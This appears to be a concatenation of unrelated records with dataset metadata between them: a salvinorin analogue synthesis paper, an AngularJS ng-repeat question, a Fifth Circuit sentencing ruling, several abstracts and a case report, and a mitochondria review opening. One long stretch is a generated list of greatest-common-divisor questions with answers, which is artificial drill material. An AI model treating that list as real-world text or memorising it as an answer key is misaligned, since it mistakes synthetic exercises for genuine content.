oxidative^[@ref32]^ and traditional Heck conditions with little success. The optimal results in these early versions of the synthesis required 10 portion-wise additions of palladium(II) acetate, 3-furanylboronic acid, and a bifluoride source. Ultimately, the yield, reproducibility, and enthusiasm for this intensive procedure were low. Fortunately, we discovered that carboxylic acids **10** or **11** (in contrast to aldehyde **9**) underwent very efficient Heck arylation as their alkali salts: the potassium carboxylate provided the highest yields of **12** and XPhos ligands promoted the highest rates and catalyst turnovers. The superiority of carboxylic acids to the corresponding aldehyde may derive from accelerated coordination/migratory insertion by initial coordination of the 3-furyl-palladium(II) by the potassium carboxylate ([Figure [5](#fig5){ref-type="fig"}](#fig5){ref-type="fig"}B). Analogy can be drawn to classic proximity effects^[@ref33]^ recently brought to bear on palladium catalysis using carboxylic acids.^[@ref34]^ To the best of our knowledge, the closest precedent in the Heck reaction of haloarenes^[@ref35]^ involves the accelerated arylation of unsaturated primary amides compared to their corresponding phthalimides.^[@ref36]^ The final obstacle to 20-nor-**1** required lactonization of the carboxylic acid onto an electron-rich conjugated alkene with Markovnikov regioselectivity and equatorial stereoselectivity---on its face an uncomplicated scenario. We were dismayed to discover that subjection of **12** to a variety of strong Brønsted acids led to furan decomposition at rates competitive with lactonization, and what little lactones could be recovered were equimolar mixtures of diastereomers at C12. The same lactones were generated in trace quantities by the Heck reaction (**11** → **12**), possibly by a Pd--H-mediated pathway,^[@ref37]^ but never in preparatively useful yields, nor with stereoselectivity. Experimentation with radical-polar crossover cyclization^[@ref38]^ and Lewis acid-assisted cyclization honed in on Bi(OTf)~3~ in hexafluoroisopropanol (HFIP) solvent as the highest yielding conditions that exhibited good lactonization rate (61%, *t*~1/2~ = 30 min at 0 °C), but no stereoselectivity. We were surprised to find that HFIP solutions of **12** in the absence of any Lewis acids underwent lactonization, albeit with substantially decreased rates (*t*~1/2~ = 3.5 days at 40 °C). These were the only conditions to exhibit stereochemical preference for 20-nor-**1** (4:1 d.r. @ 63% conversion). Neither trifluoroethanol (TFE, p*K*~a~ = 12.4)^[@ref39]^ nor nonafluoro-*tert*-butanol (p*K*~a~ = 5.2) promoted efficient lactonization, even at elevated temperature (90 °C), highlighting the idiosyncracy of HFIP (p*K*~a~ = 9.3). Weak and moderate Brønsted acids (CH~3~CO~2~H, p*K*~a~ = 4.8; phenol, p*K*~a~ = 10; CF~3~CO~2~H, p*K*~a~ = −0.25) did not cause any reaction at room temperature, whereas strong Brønsted acids (CF~3~SO~3~H, p*K*~a~ = −14) caused nonstereoselective lactonization concomitant with decomposition. The lactonization is reversible in HFIP: at elevated temperatures 20-nor-**1** equilibrates to **12** and 12-*epi*-20-nor-**1** with no stereoselectivity but favoring the lactones. Therefore, the stereoselectivity imparted by HFIP is not thermodynamic but kinetically determined. All of these observations exclude an intermolecular alkene protonation by HFIP, and instead may derive from acidification of the substrate carboxylic acid via a hydrogen bonding network, followed by internal protonation and collapse of the ion pair ([Figure [5](#fig5){ref-type="fig"}](#fig5){ref-type="fig"}B). For preparative purposes, we have found it easiest to generate 20-nor-**1** with high conversion from **12**, but with low stereoselectivity since 12-*epi*-20-nor-**1** is easily separable. Alternatively, we can halt these reactions at low conversion and good stereoselectivity (e.g., 63%, 4:1 d.r.), which may be useful for analogues whose diastereomers are inseparable. Access to 20-nor-**1** allowed us to compare its chemical reactivity and biological activity to **1**. As reported by multiple investigators, SalA is undergoes epimerization under basic conditions to disfavor the natural configuration at C8. Similarly, we found 0.5 equiv of DBU in acetonitrile-*d*~3~ generates a 29:71 mixture of **1**:8-epi-**1** at 50 °C ([Figure [6](#fig6){ref-type="fig"}](#fig6){ref-type="fig"}A). In contrast, this relative stability is reversed in 20-nor-SalA: under identical conditions the equilibrium holds at 70:30, close to the calculated *K*~eq~ ([Figure [3](#fig3){ref-type="fig"}](#fig3){ref-type="fig"}). More importantly, 20-nor-SalA retains high affinity for the κ-OR, as measured by radioligand competition binding against \[^3^H\]-U69,593. It also behaves as a full agonist in G protein signaling assays measured by the inhibition of forskolin-stimulated, adenylyl cyclase-mediated, cAMP accumulation. The pharmacological properties of 20-nor-SalA closely match the conventional, selective agonist U69,593, although SalA has slightly higher affinity and efficacy than either ([Figure [6](#fig6){ref-type="fig"}](#fig6){ref-type="fig"}C). While we consider our chemical synthesis to be more useful for scaffold diversification than for large-scale production, its brevity has allowed us to prepare enough material (\>75 mg) to test its properties in vivo. κ-OR agonists suppress non-histamine-related itch in rodents and in humans, so we evaluated the ability of 20-nor-**1** to suppress itch in mice, and found it similarly effective to SalA and another conventional agonist (U50,488H) ([Figure [6](#fig6){ref-type="fig"}](#fig6){ref-type="fig"}B) indicating a functional equivalence. ![Comparison of chemical reactivity and biological activity of 1 and 20-nor-**1**. (A) Treatment of **1** and 20-nor-**1** with DBU in MeCN-*d*~3~ at 50 °C results in slow epimerization at C8. However, **1** favors 8-*epi*-**1** (equilibrium after 11 days), whereas 20-nor-**1** is more stable than its C8 epimer (equilibrium after 3 days). (B) *Kappa* agonists suppress chloroquine phosphate-induced pruritus in mice.^[@ref10],[@ref40]^ Chloroquine phosphate (CP 40 mg/kg, s.c.) was administered 10 min following a 3 mg/kg, (s.c.) injection of each compound and scratching behaviors were monitored over time. All compounds suppressed the itch response at this dose over time compared to vehicle (1:1:8, DMSO:Tween 80:0.9% sterile saline) pretreatment (interaction of time and drug: *F*~(36, 273)~ = 19.87, *p* \< 0.0001, 2-way ANOVA (*n* = 10 veh, 5 U50, 5 20-nor-SalA, 5 SalA). (C) Affinity and functional signaling parameters at the human KOR expressed in CHO-K1 cells.^[@ref41],[@ref42]^ Radioligand competition binding assays were performed against 3H-U69,593 to determine *K*~*i*~ (*n* = 3--9). Competition binding with ^3^H-DAMGO and ^3^H-Diprenorphine was performed to determine affinity at μ-OR and δ-OR (*n* = 3). Inhibition of cAMP accumulation was used to determine EC~50~ and *E*~MAX~ values by nonlinear regression analysis (*n* = 6--8). Data are shown as the mean ± SEM. (D) Analogues synthesized from intermediate **11** using the same sequence as [Figure [5](#fig5){ref-type="fig"}](#fig5){ref-type="fig"}.](oc-2017-00488d_0005){#fig6} Preliminary proof-of-principle for the generality of this route, especially the late stage carboxylate-accelerated Heck reaction and alkene lactonization, was established by the synthesis of aryl analogues that have been inaccessible by semisynthetic modification of isolated **1** ([Figure [6](#fig6){ref-type="fig"}](#fig6){ref-type="fig"}D). For example, a thiophene has never been substituted for the naturally occurring furan, as in **13**, which exhibits high binding affinity but reduced agonism compared to 20-nor-**1**. Similarly, purely unsubstituted phenyl analogues of 20-nor-**1** (**14**) retain the same binding affinity as their furyl counterparts, even the C12-epimer of **14**. This observation stands in contrast to prior analogues formed by cycloaddition of dimethylacetylene dicarboxylate with **1** whose disubsituted phenyl rings led to 31--39 fold losses in binding affinity.^[@ref43]^ None of our analogues show appreciable binding to the alternative μ- or δ-opioid receptors (μ-OR/ δ-OR), maintaining the high receptor selectivity of **1**. Thus, a small handful of analogues has already opened opportunities for scaffold alteration, and this information should aid the design of analogues with modified physical properties.^[@ref44]^ As demonstrated here, the integration of structure perturbation, *in silico* docking, and retrosynthetic analysis can advance the use of complex secondary metabolites (natural products) as drug leads ([Figure [7](#fig7){ref-type="fig"}](#fig7){ref-type="fig"}, visualized using the Rubik's Cube analogy, as in ref ([@ref45])). The attributes of secondary metabolites have been embraced as useful library characteristics, especially high-fraction sp^3^ content, improving selectivity and hit rate.^[@ref46]−[@ref48]^ These same attributes can lead to arduous synthesis campaigns and have prompted scaffold redesign to significantly reduce complexity.^[@ref49]^ While structural complexity and synthetic complexity are related, they are nonidentical: synthesis can be simplified while structural complexity is maintained.^[@ref49],[@ref50]^ We hope to apply the approach demonstrated manually here---computed affinity/dynamic retrosynthetic analysis---to minimally perturb complexity^[@ref51]^ and affinity, only enough to reveal the most efficient retrosynthetic path. A docking program coupled to traditional retrosynthesis search algorithms^[@ref23],[@ref45]^ might easily be deployed against complex metabolites with known targets. Although restricted to a single illustration, this approach has proved successful for the salvinorin chemotype of κ-OR agonist. By deletion of a single methyl group (C20), identified here as the primary driving force for C8 epimerization, we have simultaneously stabilized the salvinorin scaffold and simplified its synthesis, while maintaining target engagement.^[@ref52]^ This chemical platform includes a carboxylate-directed Heck reaction and an unusual fluorous alcohol-promoted lactonization, which are capable of generating previously inaccessible analogues that retain high potency at the κ-OR and high selectivity against other opioid receptors. Additional modification of the 20-nor-SalA scaffold will focus on improvement of half-life in blood, bioavailability, peripheral nervous system restriction, and bias against βarrestin recruitment, as well as further scaffold stabilization. Success in these goals should deliver multiple candidates for next generation analgesics. ![Workflow for computed affinity dynamic retrosynthesis. Iterative computation could accelerate deployment of complex metabolites as drug leads. First, random structural mutation of a complex scaffold would generate an ensemble of equally complex analogues. Second, *in silico* docking using a validated computational model would screen out poor binders and generate an enriched ensemble. Third, retrosynthesis search algorithms would identify scaffolds from among this enriched ensemble that maintain the high structural complexity of the natural product (secondary metabolite), but possess reduced synthetic complexity. A medicinal chemistry campaign would thus be accelerated by facile total synthesis, accelerating optimization of properties.](oc-2017-00488d_0006){#fig7} The Supporting Information is available free of charge on the [ACS Publications website](http://pubs.acs.org) at DOI: [10.1021/acscentsci.7b00488](http://pubs.acs.org/doi/abs/10.1021/acscentsci.7b00488).NMR spectra, X-ray crystallographic data ([PDF](http://pubs.acs.org/doi/suppl/10.1021/acscentsci.7b00488/suppl_file/oc7b00488_si_001.pdf))Protein docking structures ([PDB1](http://pubs.acs.org/doi/suppl/10.1021/acscentsci.7b00488/suppl_file/oc7b00488_si_002.pdb), [PDB2](http://pubs.acs.org/doi/suppl/10.1021/acscentsci.7b00488/suppl_file/oc7b00488_si_003.pdb))Crystallographic data for **10** and 20-nor-**1** are available free of charge from the Cambridge Crystallographic Data Centre (CCDC) under reference numbers 1569390 and 1569389 ([CIF1](http://pubs.acs.org/doi/suppl/10.1021/acscentsci.7b00488/suppl_file/oc7b00488_si_004.cif), [CIF2](http://pubs.acs.org/doi/suppl/10.1021/acscentsci.7b00488/suppl_file/oc7b00488_si_005.cif)) Supplementary Material ====================== ###### oc7b00488_si_001.pdf ###### oc7b00488_si_002.pdb ###### oc7b00488_si_003.pdb ###### oc7b00488_si_004.cif ###### oc7b00488_si_005.cif ^\#^ Graduate School of Pharmaceutical Sciences, Tohoku University, 6-3 Aoba, Aramaki, Aoba-ku, Sendai 980-8578, Japan. J.J.R. and Y.S. designed and performed synthetic experiments, and analyzed the corresponding data, with R.A.S. assisting. C.L.S. designed and performed biological assays, and analyzed the corresponding data. S.Z. and V.K. designed and performed docking experiments and analyzed the corresponding data. R.C.S., L.M.B., and R.A.S. supervised the project. R.A.S. wrote the manuscript. The authors declare the following competing financial interest(s): A chemical process patent has been filed on the synthetic route, U.S. Patent Appl. 62,519,363. We thank Keary Engle for helpful conversations, Min Cho for technical support, and Arnold Rheingold, Curtis Moore, and Milan Gembicky for X-ray crystallographic analysis. Financial support for this work was provided by the NIH (GM104180, GM105766, DA031927) and Tohoku University. Additional support was provided by Eli Lilly, Novartis, Bristol-Meyers Squibb, Amgen, Boehringer-Ingelheim, the Sloan Foundation, and the Baxter Foundation.
null
minipile
NaturalLanguage
mit
null
Q: ng:repeat dupes. Getting duplicate data in ng-repeat Hey so I have a problem in my angular app in regard to dup data. I have identified the problem down to an exact ng-repeat but I can't see what is wrong with it. I am getting an error saying I have duplicate data but I can't see how it happening because I have only 4 items in my database currently. I have tried different things like renaming and such but to me it looks right so I'm a little stumped as to why I am getting the error. I am thinking maybe the data is being loaded twice but not sure how? Anyways I will post the relevant code and if some angular god out there can point me on my way I'd be forever grateful. The error message is: angular.min.js:84 Error: [ngRepeat:dupes] http://errors.angularjs.org/1.2.9/ngRepeat/dupes?p0=task%20in%20tasks%20track%20by%20task.id%20%7C%20filter%20%3A%20filterTask&p1=undefined JavaScript app.controller('tasksController', function ($scope, $http) { getTask(); // Load all available tasks function getTask() { $http.post('ajax/getTask.php').success(function (data) { $scope.tasks = data; }); } $scope.addTask = function (task) { $http.post('ajax/addTask.php?task=' + task).success(function (data) { getTask(); $scope.taskInput = ''; }); }; $scope.deleteTask = function (task) { if (confirm('Are you sure to delete this line?')) { $http.post('ajax/deleteTask.php?taskID=' + task).success(function (data) { getTask(); }); } }; $scope.toggleStatus = function (item, status, task) { if (status == '2') { status = '0'; } else { status = '2'; } $http.post('ajax/updateTask.php?taskID=' + item + '&status=' + status).success(function (data) { getTask(); }); }; }); Html: <div class="task"> <label class="checkbox" ng-repeat="task in tasks track by task.id | filter : filterTask"> <input type="checkbox" value="{{task.STATUS}}" ng-checked="task.STATUS==2" ng-click="toggleStatus(task.ID,task.STATUS, task.TASK)"/> <span ng-class="{strike:task.STATUS==2}">{{task.TASK}} [{{task.ID}}]</span> <a ng-click="deleteTask(task.ID)" class="pull-right"><i class="glyphicon glyphicon-trash"></i></a> </label> </div> A: As the link in the error message suggests, you can work around the issue using track by: <div ng-repeat="value in [4, 4] track by $index"></div>
null
minipile
NaturalLanguage
mit
null
United States Court of Appeals Fifth Circuit F I L E D IN THE UNITED STATES COURT OF APPEALS FOR THE FIFTH CIRCUIT June 25, 2003 Charles R. Fulbruge III Clerk No. 02-51057 Conference Calendar UNITED STATES OF AMERICA, Plaintiff-Appellee, versus JUAN ZUNIGA-GUEVARA, Defendant-Appellant. -------------------- Appeal from the United States District Court for the Western District of Texas USDC No. A-02-CR-165-ALL-SS -------------------- Before DeMOSS, DENNIS, and PRADO, Circuit Judges. PER CURIAM:* Juan Zuniga-Guevara appeals the sentence imposed following his guilty plea conviction of being found in the United States after deportation/removal in violation of 8 U.S.C. § 1326. Zuniga contends that 8 U.S.C. § 1326(b) is unconstitutional. He argues that the prior conviction that resulted in his increased sentence is an element of a separate offense under 8 U.S.C. § 1326(b) that should have been alleged in his indictment. Zuniga maintains that he pleaded guilty to an indictment which * Pursuant to 5TH CIR. R. 47.5, the court has determined that this opinion should not be published and is not precedent except under the limited circumstances set forth in 5TH CIR. R. 47.5.4. No. 02-51057 -2- charged only simple reentry under 8 U.S.C. § 1326(a). He argues that his sentence exceeds the maximum term of imprisonment and supervised release which may be imposed for that offense. In Almendarez-Torres v. United States, 523 U.S. 224, 235 (1998), the Supreme Court held that the enhanced penalties in 8 U.S.C. § 1326(b) are sentencing provisions, not elements of separate offenses. The Court further held that the sentencing provisions do not violate the Due Process Clause. Id. at 239-47. Zuniga acknowledges that his arguments are foreclosed by Almendarez-Torres, but asserts that the decision has been cast into doubt by Apprendi v. New Jersey, 530 U.S. 466, 490 (2000). He seeks to preserve his arguments for further review. Apprendi did not overrule Almendarez-Torres. See Apprendi, 530 U.S. at 489-90; United States v. Dabeit, 231 F.3d 979, 984 (5th Cir. 2000). This court must follow Almendarez-Torres “unless and until the Supreme Court itself determines to overrule it.” Dabeit, 231 F.3d at 984 (internal quotation marks and citation omitted). The judgment of the district court is AFFIRMED. The Government has moved for a summary affirmance in lieu of filing an appellee’s brief. In its motion, the Government asks that an appellee’s brief not be required. The motion is GRANTED. AFFIRMED; MOTION GRANTED.
null
minipile
NaturalLanguage
mit
null
1 and 81? 27 What is the highest common factor of 382 and 455153? 191 Calculate the highest common divisor of 714150 and 300. 150 What is the highest common divisor of 175 and 19880? 35 What is the highest common divisor of 75257 and 273? 91 Calculate the highest common divisor of 5 and 79625. 5 Calculate the greatest common divisor of 18 and 53202. 6 What is the greatest common factor of 1049 and 1190615? 1049 What is the greatest common divisor of 2592 and 5751? 81 Calculate the greatest common divisor of 166 and 94786. 166 Calculate the greatest common divisor of 90 and 11934. 18 Calculate the highest common divisor of 259 and 16095. 37 Calculate the greatest common divisor of 12294009 and 17. 17 What is the greatest common factor of 10 and 372895? 5 Calculate the greatest common divisor of 446266 and 2. 2 What is the highest common factor of 279464 and 193? 193 What is the greatest common factor of 6912 and 1032? 24 Calculate the greatest common factor of 456 and 36898. 38 Calculate the highest common divisor of 387 and 19909. 43 Calculate the greatest common divisor of 89628 and 396. 132 What is the greatest common divisor of 1751 and 34? 17 Calculate the greatest common factor of 414201 and 707. 101 Calculate the greatest common factor of 14611 and 874. 19 Calculate the highest common divisor of 110 and 1792230. 110 Calculate the highest common divisor of 59 and 104194. 59 Calculate the greatest common factor of 2299 and 12388. 19 Calculate the highest common divisor of 166451 and 943. 23 What is the highest common factor of 231 and 12397? 77 Calculate the highest common divisor of 2187 and 26325. 81 Calculate the highest common factor of 8967 and 7991. 61 Calculate the greatest common factor of 1720 and 401749. 43 What is the highest common divisor of 396 and 6018804? 396 Calculate the highest common divisor of 107510 and 1. 1 Calculate the greatest common divisor of 117 and 100071. 9 What is the greatest common factor of 80984 and 26712? 424 Calculate the greatest common divisor of 342426 and 168. 42 Calculate the highest common divisor of 249813 and 1107. 369 Calculate the highest common factor of 142795 and 45. 5 What is the highest common divisor of 1327553 and 283? 283 What is the greatest common factor of 942378 and 102? 102 What is the highest common factor of 2266 and 76838? 206 What is the greatest common divisor of 689828 and 2528? 316 What is the greatest common divisor of 15813 and 1911? 21 Calculate the highest common factor of 37 and 356791. 37 What is the highest common factor of 614862 and 90? 18 What is the greatest common divisor of 1047 and 69? 3 Calculate the greatest common factor of 240416 and 64. 32 Calculate the greatest common divisor of 506 and 50446. 22 Calculate the highest common divisor of 2094887 and 279. 31 Calculate the greatest common divisor of 4606 and 65268. 98 What is the highest common divisor of 48289 and 43? 43 What is the greatest common divisor of 14820 and 2899? 13 Calculate the greatest common divisor of 24434 and 13503. 643 What is the greatest common divisor of 3710 and 1166? 106 What is the greatest common divisor of 2400 and 21850? 50 Calculate the highest common divisor of 18 and 55554. 6 Calculate the highest common divisor of 239834 and 1036. 518 Calculate the highest common divisor of 1107 and 701961. 123 Calculate the highest common factor of 17806 and 2. 2 Calculate the greatest common factor of 86052 and 20604. 1212 Calculate the greatest common factor of 840 and 61656. 168 What is the greatest common divisor of 18921 and 35? 7 What is the greatest common factor of 69240 and 100? 20 What is the greatest common divisor of 1 and 136309? 1 Calculate the highest common divisor of 870 and 331905. 435 Calculate the highest common divisor of 4380 and 540. 60 Calculate the highest common factor of 506 and 3278. 22 Calculate the highest common divisor of 183 and 617869. 61 What is the highest common divisor of 52650 and 95550? 1950 What is the greatest common divisor of 1157530 and 2618? 374 Calculate the greatest common divisor of 20940 and 2016. 12 Calculate the greatest common factor of 128 and 35408. 16 What is the highest common divisor of 85936 and 287? 41 Calculate the greatest common factor of 17371 and 42529. 599 Calculate the greatest common divisor of 55044 and 891. 99 Calculate the greatest common factor of 60 and 2681300. 20 What is the highest common divisor of 36982 and 198? 22 What is the highest common factor of 6 and 2249? 1 Calculate the greatest common divisor of 1078921 and 106. 53 What is the highest common divisor of 6312 and 40? 8 Calculate the highest common factor of 7 and 16667. 7 Calculate the greatest common factor of 100685 and 109979. 1549 Calculate the greatest common factor of 148 and 1972396. 148 What is the greatest common factor of 8920 and 280? 40 What is the greatest common divisor of 76121 and 5542? 163 What is the highest common divisor of 16075 and 75? 25 What is the highest common factor of 216 and 854136? 72 Calculate the highest common divisor of 18 and 57618. 18 What is the highest common divisor of 1625 and 4250? 125 What is the greatest common factor of 18225846 and 18? 18 What is the highest common divisor of 1243 and 14553? 11 What is the highest common divisor of 114466 and 726? 242 What is the greatest common factor of 46305 and 270? 135 What is the highest common factor of 174 and 726? 6 What is the greatest common factor of 310 and 961? 31 Calculate the highest common divisor of 480 and 2718960. 240 Calculate the highest common divisor of 4704 and 2254. 98 What is the highest common factor of 18435 and 45? 15 Calculate the greatest common factor of 572 and 391534. 286 Calculate the highest common factor of 406827 and 867. 51 What is the highest common factor of 116 and 6076? 4 Calculate the greatest common divisor of 600 and 5352. 24 What is the greatest common factor of 616469 and 2737? 161 Calculate the highest common divisor of 8077 and 7298. 41 What is the greatest common factor of 4541 and 4009? 19 What is the highest common factor of 1968 and 48? 48 What is the greatest common divisor of 79200 and 32? 32 What is the greatest common divisor of 152 and 32? 8 Calculate the highest common divisor of 5735 and 34780. 185 Calculate the greatest common factor of 21560 and 49. 49 Calculate the greatest common factor of 880 and 1370. 10 Calculate the highest common divisor of 13090 and 384230. 770 What is the greatest common divisor of 460 and 1115? 5 Calculate the highest common factor of 306 and 17544. 102 Calculate the greatest common factor of 376160 and 320. 160 Calculate the greatest common factor of 177183 and 171. 9 What is the greatest common divisor of 15579 and 18? 9 Calculate the highest common divisor of 453045 and 10. 5 What is the greatest common divisor of 47745 and 180? 45 What is the greatest common factor of 482 and 70131? 241 Calculate the greatest common factor of 210133 and 2310. 77 Calculate the highest common factor of 50 and 1635375. 25 What is the greatest common divisor of 11080 and 16? 8 What is the greatest common divisor of 1129700 and 316? 316 Calculate the highest common divisor of 1249308 and 36. 36 What is the greatest common divisor of 17 and 25568? 17 What is the greatest common divisor of 10591 and 105? 7 What is the greatest common divisor of 306943 and 182? 91 What is the greatest common factor of 75558 and 28? 14 Calculate the highest common factor of 9102 and 18942. 246 Calculate the highest common divisor of 1126840 and 880. 440 What is the highest common factor of 440 and 31700? 20 What is the greatest common divisor of 23048 and 8600? 344 What is the greatest common divisor of 648 and 12072? 24 Calculate the greatest common factor of 882 and 2625. 21 What is the greatest common factor of 121510 and 10894? 838 What is the greatest common divisor of 18904 and 153? 17 What is the highest common divisor of 630 and 419265? 315 Calculate the greatest common factor of 131593 and 525. 7 What is the highest common divisor of 9776 and 77584? 208 What is the highest common factor of 423612 and 819? 63 What is the highest common factor of 9456 and 2352? 48 Calculate the greatest common factor of 4074203 an
null
minipile
NaturalLanguage
mit
null
Behavioral evidence suggests that instrumental conditioning is governed by two forms of action control: a goal-directed and a habit learning process. Model-based reinforcement learning (RL) has been argued to underlie the goal-directed process; however, the way in which it interacts with habits and the structure of the habitual process has remained unclear. According to a flat architecture, the habitual process corresponds to model-free RL, and its interaction with the goal-directed process is coordinated by an external arbitration mechanism. Alternatively, the interaction between these systems has recently been argued to be hierarchical, such that the formation of action sequences underlies habit learning and a goal-directed process selects between goal-directed actions and habitual sequences of actions to reach the goal. Here we used... BACKGROUND: Accelerometry is rapidly becoming the instrument of choice for measuring physical activity in children. However, as limited data exist on the minimum number of days accelerometry required to provide a reliable estimate of habitual physical activity, we aimed to quantify the number of days of recording required to estimate both habitual physical activity and habitual sedentary behavior in primary school children. METHODS: We measured physical activity and sedentary behavior over 7 days in 291 6- to 8-year-olds using Actigraph accelerometers. Between-day intraclass reliability coefficients were calculated and averaged across all combinations of days. RESULTS: Although reliability increased with time, 3 days of recording provided reliabilities for volume of activity, moderate-vigorous intensity activity, and sedentary behavior... Habitual dislocation of the patella (HDP) is a common presentation in pediatric age unlike adults. Many surgical procedures using proximal realignment and distal realignment have been reported to treat HDP in children with satisfactory results. However, late presentation of habitual patellar dislocation with osteoarthritis is rare and treatment plan has not yet been established. We present a case of neglected iatrogenic habitual patellar dislocation with osteoarthritis in a 50-year-old woman. Two-staged procedure was planned, first with patellar realignment and later with definitive total knee arthroplasty. Quadricepsplasty, medial patello-femoral ligament reconstruction, lateral release and tibial tuberosity transfer was done as primary procedure and total knee arthroplasty, which was planned as secondary procedure, was deferred as th... Shifting between goal-directed and habitual actions allows for efficient and flexible decision-making. Here we demonstrate a novel, within-subject instrumental lever-pressing paradigm where mice shift between goal-directed and habitual actions. We identify a role for orbitofrontal cortex (OFC) in actions following outcome-revaluation, and confirm that dorsal medial (DMS) and lateral striatum (DLS) mediate different action strategies. In-vivo simultaneous recordings of OFC, DMS, and DLS neuronal ensembles during shifting reveal that the same neurons display different activity depending on whether presses are goal-directed or habitual, with DMS and OFC becoming more—and DLS less-engaged during goal-directed actions. Importantly, the magnitude of neural activity changes in OFC following changes in outcome value positively correlates with ... Progressive loss of the ascending dopaminergic projection in the basal ganglia is a fundamental pathological feature of Parkinson's disease. Studies in animals and humans have identified spatially segregated functional territories in the basal ganglia for the control of goal-directed and habitual actions. In patients with Parkinson's disease the loss of dopamine is predominantly in the posterior putamen, a region of the basal ganglia associated with the control of habitual behaviour. These patients may therefore be forced into a progressive reliance on the goal-directed mode of action control that is mediated by comparatively preserved processing in the rostromedial striatum. Thus, many of their behavioural difficulties may reflect a loss of normal automatic control owing to distorting output signals from habitual control circuits, whi... Twelve healthy, fully-dentate subjects participated in experiments which included the continuous recording of surface electromyography and jaw movement during habitual and deliberate right-sided or left-sided chewing of a coherent bolus. Analogue data streams were converted to digital values. Root-mean-square (r.m.s.) muscle-activity traces were computed from raw electromyographic data. The working side was defined as the side from which the mandible approached the position of occlusal stoppage when in the most cranially directed part of the chewing cycle. In any given muscle, greater mean peak r.m.s. activities were found with ipsilateral than contralateral bolus replacement (p &lt; 0.01, s); such differences were more pronounced for the masseter than the anterior temporal muscles. During habitual chewing, mean peak r.m.s. activities ... In the present research the effectiveness of implementation intentions suppressing a habitual snacking response was investigated. Based on the literature on processing of negations and on thought suppression, it was expected that implementation intentions with an ‘if (situation), then not (habitual response)’ structure would, ironically, reinforce the habit one is trying to break. Using lexical decision tasks, it was shown that forming suppression implementation intentions results in (a) a heightened cognitive ‘situation- snack’ association, compared to an intention only control group (Studies 1 and 2) or compared to forming an implementation intention specifying the substitution of the habitual response with a new response (Study 3), and (b) a higher frequency and amount of eating unhealthy snacks (Study 3). Furthermore, Study 4 showe... Previous studies have demonstrated that sleep duration is closely associated with metabolic risk factors. However, the relationship between habitual sleep duration and blood pressure values in Japanese population has not been fully established. We performed a cross-sectional study of 1,670 Japanese male subjects to clarify the relationship between habitual sleep duration and blood pressure values. The study subjects were divided into four groups (< 6, 6-, 7-, and a parts per thousand yen8 h) according to their nightly habitual sleep duration. The rate of subjects with < 6, 6-, 7-, and a parts per thousand yen8 h sleep duration was 12.0, 37.6, 38.2, and 12.2 %, respectively. Compared with the group with 7-h sleep duration (referent), the < 6 and a parts per thousand yen8 h groups had significantly greater systolic and diastolic blood pr... Chronic alcohol misuse is an intractable problem for contemporary medicine. This paper explores some of the origins of this intractability, by examining the formulation of medical and moral models of habitual drunkenness during the nineteenth century. Its objective is to sketch out an historical perspective for contemporary problems in disentangling the relationship between culpability and susceptibility in alcohol dependence. Want to know more?If you want to know more about this cutting edge product, or schedule a demonstration on your own organisation, please feel free to contact us or read the available documentation at http://www.keep.pt/produtos/retrievo/?lang=en
null
minipile
NaturalLanguage
mit
null
Effect of CD133-positive stem cells in repeated recurrence of hepatocellular carcinoma after liver transplantation: a case report. Liver transplantation (LT) is currently one of the best available strategies for treating multiple hepatocellular carcinoma (HCC) and decompensated liver cirrhosis. However, patients often undergo HCC recurrence after LT, with most HCC recurrences detected at 1-2 years. CD133 was the first identified member of the prominin family of pentaspan membrane proteins and is a marker of hepatic stem cells. Here, we report a unique case of seven repeated recurrences of HCC in the lungs after LT, with all HCC recurrences resected curatively by a thoracoscopic approach. Pathological examination revealed moderately differentiated HCC identical to that in the original histology of the liver tumor. Interestingly, no CD133 immunoreactivity was observed in cancerous lesions of the primary HCC and the 1st to 2nd recurrences, as indicated by immunohistochemistry. However, CD133 was strongly stained in the cancerous lesions from the 3rd to 7th recurrences. The patient survived and had no recurrence after 9 years of the initial living donor LT. In conclusion, we investigated an evocative case of seven repeated recurrences of HCC in the lungs to elucidate the significance of circulating CD133-positive hepatic stem cells. This case illustrates the need for further research to clarify the mutual effect of CD133-positive hepatic stem cells for the development of new therapeutic strategies.
null
minipile
NaturalLanguage
mit
null
1. Introduction {#sec1-cells-09-00150} =============== Mitochondria are termed the "powerhouses" of the cell, and generate the majority of the cell's supply of adenosine triphosphate (ATP) through the oxidative phosphorylation system (OXPHOS) in which electrons produced by the citric acid cycle are transferred down the mitochondrial respiratory complexes. Neurons have particularly high and continuous energy demands so that mitochondrial function is essential for maintaining neuronal integrity and responsiveness \[[@B1-cells-09-00150],[@B2-cells-09-00150],[@B3-cells-09-00150],[@B4-cells-09-00150],[@B5-cells-09-00150],[@B6-cells-09-00150],[@B7-cells-09-00150]\]. Mitochondrial energy production fuels various critical neuronal functions, especially the ATP-dependent neurotransmission \[[@B1-cells-09-00150],[@B3-cells-09-00150],[@B8-cells-09-00150]\]. Along with regulating energy levels, mitochondria have a high capacity to sequester excessive Ca^2+^ and release Ca^2+^ so as to prolong residual levels at synaptic terminals \[[@B9-cells-09-00150],[@B10-cells-09-00150]\]. Through this mechanism, mitochondria play essential roles in maintaining and regulating neurotransmission \[[@B11-cells-09-00150],[@B12-cells-09-00150]\], as well as certain types of short-term synaptic plasticity \[[@B13-cells-09-00150],[@B14-cells-09-00150]\]. In addition, mounting evidence has demonstrated the critical role of mitochondria in the maintenance of cellular homeostasis \[[@B15-cells-09-00150]\]. Glucose was shown to be an efficient energy source in neurons and glia that can consume energy produced in parallel by glycolysis and OXPHOS. However, upon neural network activation, the energy demand is robustly enhanced. Given ATP as the main energy source in neurons, mitochondrial energy metabolism thus may play a major role in supplying ATP to fuel these neuronal activities. Importantly, distinct mitochondrial energetic status might also have a significant impact on the cellular signaling pathways. Aged and dysfunctional mitochondria are defective in ATP production and Ca^2+^ buffering, leading to energy deficit and interruptions of neuronal function and health. Furthermore, damaged mitochondria trigger concomitant leakage of electrons and thus promote the production of harmful reactive oxygen species (ROS) that can damage nucleic acids, proteins, and membrane lipids \[[@B1-cells-09-00150],[@B16-cells-09-00150],[@B17-cells-09-00150],[@B18-cells-09-00150]\]. Moreover, mitochondrial oxidative stress leads to the release of cytochrome *c*, a mitochondrial intermembrane space protein, into the cytosol, inducing DNA damage, caspase activation, and apoptosis \[[@B6-cells-09-00150]\]. A large body of work suggests that mitochondrial dysfunction underlies cognitive decline in neuronal aging and is one of the most notable hallmarks of age-associated neurodegenerative diseases. Mitochondrial damage causes energy deficit, oxidative stress, and impaired cellular signaling, which has been linked to the pathogenesis of neurodegeneration diseases \[[@B2-cells-09-00150],[@B19-cells-09-00150],[@B20-cells-09-00150],[@B21-cells-09-00150]\]. Given that a mitochondrion's half-life is 